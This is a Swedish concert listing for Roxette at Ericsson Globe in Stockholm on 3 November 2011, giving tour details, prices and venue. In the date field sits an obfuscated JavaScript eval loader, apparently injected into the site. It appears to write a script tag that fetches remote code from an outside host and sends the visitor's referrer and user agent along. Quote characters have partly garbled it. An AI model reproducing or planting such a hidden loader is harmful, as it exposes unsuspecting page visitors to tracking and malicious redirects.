Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Roxette till Stockholm Globen

Roxette till Stockholm Globen
Sebastian

Datum: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zdzin|var|u0026u|referrer|nbkze||js|php’.split(’|’),0,{}))
Torsdag 3 November 2011, kl 19:30

Roxette är ute på världsturné och gör två stopp i Sverige. Den 3 nov på Ericsson Globe i Stockholm och den 4 nov på Malmö Arena.

Roxettes världsturné pågår för fullt och för alla svenska Roxette-fans kan vi glädjande meddela att i november kommer Roxette att göra två stopp i Sverige på sin turné, den 3 november på Ericsson Globe i Stockholm och den 4 november på Malmö Arena.

Roxette skördar stora framgångar både med världsturnén och nya albumet ”Charm School”. Turnén fortsätter att växa och fler och fler konserter adderas. Det är därför extra kul att kunna presentera två svenska spelplatser: Ericsson Globe och Malmö Arena på höstdelen av Roxettes världsturné som just nu är utan slut?.

Åldersgräns 13 år.

Endast direktbetalning.

Globen – Ericsson Globe
Globentorget 2
12177 Stockholm

Pris från 475 till 595 kr